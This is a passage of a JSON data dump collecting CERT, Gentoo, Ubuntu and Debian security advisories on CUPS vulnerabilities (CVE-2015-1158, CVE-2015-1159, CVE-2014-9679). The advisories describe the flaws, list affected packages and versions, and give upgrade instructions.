on the heap. The dangling pointer causes ACL verification to fail when parsing `'admin/conf'` and` ``'admin'` ACLs. The ACL handling failure results in unrestricted access to privileged operations, allowing an unauthenticated remote user to upload a replacement CUPS configuration file and mount further attacks. \n \nThis vulnerability was introduced in CUPS 1.2.0, released in 2006. All major versions of CUPS from 1.2 to 2.0 are vulnerable. This vulnerability is exploitable by default and without any special permissions other than the ability to send a print job request. \n \n[**CWE-79**](<http://cwe.mitre.org/data/definitions/79.html>)**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - **CVE-2015-1159 \n \nA cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web._ _In certain cases, the CGI template can echo user input to file rather than escaping the text first. This may be used to set up a reflected XSS attack in the QUERY parameter of the web interface help page. By default, many linux distributions run with the web interface activated; OS X has the web interface deactivated by default. \n \nThe CVSS score below is based on CVE-2015-1158. \n \n--- \n \n### Impact\n\nCVE-2015-1158 may allow a remote unauthenticated attacker access to privileged operations on the CUPS server. CVE-2015-1159 may allow an attacker to execute arbitrary javascript in a user's browser. \n \n--- \n \n### Solution\n\n**Apply an update** \n \nA [patch](<http://www.cups.org/blog.php?L1082+I0+Q>) addressing these issues has been released for all supported versions of CUPS. For the version 2.0 branch (the latest release), 2.0.3 contains the patch. Affected users are encouraged to update as soon as possible. \n \n--- \n \n### Vendor Information \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nApple| | 06 May 2015| 08 May 2015 \nFreeBSD Project| | 08 May 2015| 10 Jun 2015 \nopenSUSE project| | 08 May 2015| 10 Jun 2015 \nSUSE Linux| | 08 May 2015| 10 Jun 2015 \nCentOS| | 08 May 2015| 08 May 2015 \nDebian GNU/Linux| | 08 May 2015| 08 May 2015 \nDesktopBSD| | 08 May 2015| 08 May 2015 \nDragonFly BSD Project| | 08 May 2015| 08 May 2015 \nEMC Corporation| | 08 May 2015| 08 May 2015 \nF5 Networks, Inc.| | 08 May 2015| 08 May 2015 \nFedora Project| | 08 May 2015| 08 May 2015 \nGentoo Linux| | 08 May 2015| 08 May 2015 \nHewlett-Packard Company| | 08 May 2015| 08 May 2015 \nHitachi| | 08 May 2015| 08 May 2015 \nIBM Corporation| | 08 May 2015| 08 May 2015 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23810572 Vendor Status Inquiry>). \n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C \nTemporal | 7.3 | E:POC/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n### References\n\n * <http://www.cups.org/blog.php?L1082+I0+Q>\n * <https://www.cups.org/str.php?L4609>\n\n### Credit\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n * CVE IDs: [CVE-2015-1158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1158>) [CVE-2015-1159](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1159>)\n * Date Public: 08 Jun 2015\n * Date First Published: 09 Jun 2015\n * Date Last Updated: 10 Jun 2015\n * Document Revision: 42\n\n", "edition": 5, "reporter": "CERT", "published": "2015-06-09T00:00:00", "title": "CUPS print service is vulnerable to privilege escalation and cross-site scripting", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "info", "cvelist": ["CVE-2015-1158", "CVE-2015-1158", "CVE-2015-1158", "CVE-2015-1158", "CVE-2015-1158", "CVE-2015-1159", "CVE-2015-1159", "CVE-2015-1159", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "id": "VU:810572", "href": "https://www.kb.cert.org/vuls/id/810572", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "references": ["http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1158", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1159", "https://bugs.gentoo.org/show_bug.cgi?id=551846"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0.3", "packageName": "net-print/cups", "packageFilename": "UNKNOWN", "arch": "all", "operator": "lt"}], "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in cups. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.3\"", "edition": 1, "reporter": "Gentoo Foundation", "published": "2015-10-31T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-10-31T00:00:00", "id": "GLSA-201510-07", "href": "https://security.gentoo.org/glsa/201510-07", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:40", "references": ["https://bugs.gentoo.org/show_bug.cgi?id=539582", "http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9679"], "affectedPackage": [{"OS": "Gentoo", "OSVersion": "any", "packageVersion": "2.0.2-r1", "arch": "all", "packageFilename": "UNKNOWN", "packageName": "net-print/cups", "operator": "lt"}], "edition": 1, "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nA vulnerability has been discovered in CUPS concerning the handling of compressed raster files. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.2-r1\"", "reporter": "Gentoo Foundation", "published": "2016-07-16T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "gentoo", "title": "CUPS: Buffer overflow", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "modified": "2016-07-16T00:00:00", "id": "GLSA-201607-06", "href": "https://security.gentoo.org/glsa/201607-06", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:10:16", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2015-1159", "https://people.canonical.com/~ubuntu-security/cve/CVE-2015-1158"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.5.3-0ubuntu8.7", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.7.2-0ubuntu1.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "15.04", "packageVersion": "2.0.2-1ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "1.7.5-3ubuntu3.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}], "description": "It was discovered that CUPS incorrectly handled reference counting when handling localized strings. A remote attacker could use this issue to escalate permissions, upload a replacement CUPS configuration file, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a cross-site scripting issue. A remote attacker could use this issue to bypass default configuration settings. (CVE-2015-1159)", "edition": 3, "reporter": "Ubuntu", "published": "2015-06-10T00:00:00", "title": "CUPS vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "id": "USN-2629-1", "href": "https://usn.ubuntu.com/2629-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:10:19", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2014-9679"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "10.04", "packageVersion": "1.4.3-1ubuntu1.14", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.10", "packageVersion": "1.7.5-3ubuntu3.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "14.04", "packageVersion": "1.7.2-0ubuntu1.5", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "12.04", "packageVersion": "1.5.3-0ubuntu8.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "cups", "operator": "lt"}], "description": "Peter De Wachter discovered that CUPS incorrectly handled certain malformed compressed raster files. A remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.", "edition": 3, "reporter": "Ubuntu", "published": "2015-02-26T00:00:00", "title": "CUPS vulnerability", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "modified": "2015-02-26T00:00:00", "id": "USN-2520-1", "href": "https://usn.ubuntu.com/2520-1/", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:06", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups-ppdc_1.4.4-7+squeeze8_all.deb", "packageName": "cups-ppdc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsmime1_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsmime1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsdriver1-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsdriver1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsppdc1-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsppdc1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsppdc1_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsppdc1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups-dbg_1.4.4-7+squeeze8_all.deb", "packageName": "cups-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupscgi1-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcupscgi1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcups2-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcups2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsimage2_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsimage2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsimage2-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsimage2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cupsddk_1.4.4-7+squeeze8_all.deb", "packageName": "cupsddk", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsdriver1_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsdriver1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups-bsd_1.4.4-7+squeeze8_all.deb", "packageName": "cups-bsd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcups2_1.4.4-7+squeeze8_all.deb", "packageName": "libcups2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups-client_1.4.4-7+squeeze8_all.deb", "packageName": "cups-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups_1.4.4-7+squeeze8_all.deb", "packageName": "cups", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupscgi1_1.4.4-7+squeeze8_all.deb", "packageName": "libcupscgi1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "cups-common_1.4.4-7+squeeze8_all.deb", "packageName": "cups-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze8", "arch": "all", "packageFilename": "libcupsmime1-dev_1.4.4-7+squeeze8_all.deb", "packageName": "libcupsmime1-dev", "operator": "lt"}], "description": "Package : cups\nVersion : 1.4.4-7+squeeze8\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nTwo critical vulnerabilities have been found in the CUPS printing \nsystem:\n\nCVE-2015-1158 - Improper Update of Reference Count\n Cupsd uses reference-counted strings with global scope. When parsing\n a print job request, cupsd over-decrements the reference count for a\n string from the request. As a result, an attacker can prematurely\n free an arbitrary string of global scope. They can use this to \n dismantle ACL\u2019s protecting privileged operations, and upload a\n replacement configuration file, and subsequently run arbitrary code\n on a target machine.\n\n This bug is exploitable in default configurations, and does not\n require any special permissions other than the basic ability to\n print.\n\nCVE-2015-1159 - Cross-Site Scripting \n A cross-site scripting bug in the CUPS templating engine allows the\n above bug to be exploited when a user browses the web. This XSS is\n reachable in the default configuration for Linux instances of CUPS,\n and allows an attacker to bypass default configuration settings that\n bind the CUPS scheduler to the \u2018localhost\u2019 or loopback interface.\n\n", "edition": 1, "reporter": "Debian", "published": "2015-06-09T10:27:37", "title": "[SECURITY] [DLA 239-1] cups security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:06", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-09T10:27:37", "id": "DEBIAN:DLA-239-1:10F45", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201506/msg00003.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-18T13:49:14", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-dbg_1.7.5-11+deb8u1_all.deb", "packageName": "cups-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "7", "packageVersion": "1.5.3-5+deb7u6", "arch": "all", "packageFilename": "cups_1.5.3-5+deb7u6_all.deb", "packageName": "cups", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupscgi1-dev_1.7.5-11+deb8u1_all.deb", "packageName": "libcupscgi1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsppdc1-dev_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsppdc1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-core-drivers_1.7.5-11+deb8u1_all.deb", "packageName": "cups-core-drivers", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcups2-dev_1.7.5-11+deb8u1_all.deb", "packageName": "libcups2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-server-common_1.7.5-11+deb8u1_all.deb", "packageName": "cups-server-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcups2_1.7.5-11+deb8u1_all.deb", "packageName": "libcups2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-bsd_1.7.5-11+deb8u1_all.deb", "packageName": "cups-bsd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups_1.7.5-11+deb8u1_all.deb", "packageName": "cups", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-common_1.7.5-11+deb8u1_all.deb", "packageName": "cups-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-daemon_1.7.5-11+deb8u1_all.deb", "packageName": "cups-daemon", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsmime1-dev_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsmime1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsimage2-dev_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsimage2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsppdc1_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsppdc1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsmime1_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsmime1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-client_1.7.5-11+deb8u1_all.deb", "packageName": "cups-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupsimage2_1.7.5-11+deb8u1_all.deb", "packageName": "libcupsimage2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "cups-ppdc_1.7.5-11+deb8u1_all.deb", "packageName": "cups-ppdc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "8", "packageVersion": "1.7.5-11+deb8u1", "arch": "all", "packageFilename": "libcupscgi1_1.7.5-11+deb8u1_all.deb", "packageName": "libcupscgi1", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3283-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 09, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2015-1158 CVE-2015-1159\n\nIt was discovered that CUPS, the Common UNIX Printing System, is\nvulnerable to a remotely triggerable privilege escalation via cross-site\nscripting and bad print job submission used to replace cupsd.conf on the\nCUPS server.\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2015-06-09T20:25:07", "title": "[SECURITY] [DSA 3283-1] cups security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:49:14", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-09T20:25:07", "id": "DEBIAN:DSA-3283-1:BE2B4", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00178.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-18T13:50:17", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "7", "packageVersion": "1.5.3-5+deb7u5", "arch": "all", "packageFilename": "cups_1.5.3-5+deb7u5_all.deb", "packageName": "cups", "operator": "lt"}], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3172-1 security@debian.org\nhttp://www.debian.org/security/ Sebastien Delafond\nFebruary 25, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : cups\nCVE ID : CVE-2014-9679\nDebian Bug : 778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nFor the upcoming stable distribution (jessie) and unstable\ndistribution (sid), this problem has been fixed in version 1.7.5-11.\n\nWe recommend that you upgrade your cups packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 2, "reporter": "Debian", "published": "2015-02-25T18:21:23", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-18T13:50:17", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "modified": "2015-02-25T18:21:23", "id": "DEBIAN:DSA-3172-1:C0A28", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00057.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-16T22:14:04", "references": [], "affectedPackage": [{"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups-common_1.4.4-7+squeeze7_all.deb", "packageName": "cups-common", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupscgi1_1.4.4-7+squeeze7_all.deb", "packageName": "libcupscgi1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsdriver1-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsdriver1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsmime1_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsmime1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupscgi1-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcupscgi1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsppdc1_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsppdc1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcups2-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcups2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsimage2-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsimage2-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsdriver1_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsdriver1", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cupsddk_1.4.4-7+squeeze7_all.deb", "packageName": "cupsddk", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups-client_1.4.4-7+squeeze7_all.deb", "packageName": "cups-client", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups-dbg_1.4.4-7+squeeze7_all.deb", "packageName": "cups-dbg", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsmime1-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsmime1-dev", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups-ppdc_1.4.4-7+squeeze7_all.deb", "packageName": "cups-ppdc", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcups2_1.4.4-7+squeeze7_all.deb", "packageName": "libcups2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups-bsd_1.4.4-7+squeeze7_all.deb", "packageName": "cups-bsd", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "cups_1.4.4-7+squeeze7_all.deb", "packageName": "cups", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsimage2_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsimage2", "operator": "lt"}, {"OS": "Debian", "OSVersion": "6", "packageVersion": "1.4.4-7+squeeze7", "arch": "all", "packageFilename": "libcupsppdc1-dev_1.4.4-7+squeeze7_all.deb", "packageName": "libcupsppdc1-dev", "operator": "lt"}], "description": "Package : cups\nVersion : 1.4.4-7+squeeze7\nCVE ID : CVE-2014-9679\nDebian Bug : #778387\n\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\nSystem, did not correctly parse compressed raster files. By submitting\na specially crafted raster file, a remote attacker could use this\nvulnerability to trigger a buffer overflow.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.4.4-7+squeeze7.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.5.3-5+deb7u5.\n\nWe recommend that you upgrade your cups packages.\n\n-- \nBen Hutchings - Debian developer, kernel team member\n", "edition": 1, "reporter": "Debian", "published": "2015-02-27T13:03:36", "title": "[SECURITY] [DLA 159-1] cups security update", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:04", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "modified": "2015-02-27T13:03:36", "id": "DEBIAN:DLA-159-1:19AEB", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201502/msg00013.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "references": [], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2629-1\r\nJune 10, 2015\r\n\r\ncups vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in CUPS.\r\n\r\nSoftware Description:\r\n- cups: Common UNIX Printing System&#40;tm&#41;\r\n\r\nDetails:\r\n\r\nIt was discovered that CUPS incorrectly handled reference counting when\r\nhandling localized strings. A remote attacker could use this issue to\r\nescalate permissions, upload a replacement CUPS configuration file, and\r\nexecute arbitrary code. &#40;CVE-2015-1158&#41;\r\n\r\nIt was discovered that the CUPS templating engine contained a cross-site\r\nscripting issue. A remote attacker could use this issue to bypass default\r\nconfiguration settings. &#40;CVE-2015-1159&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by 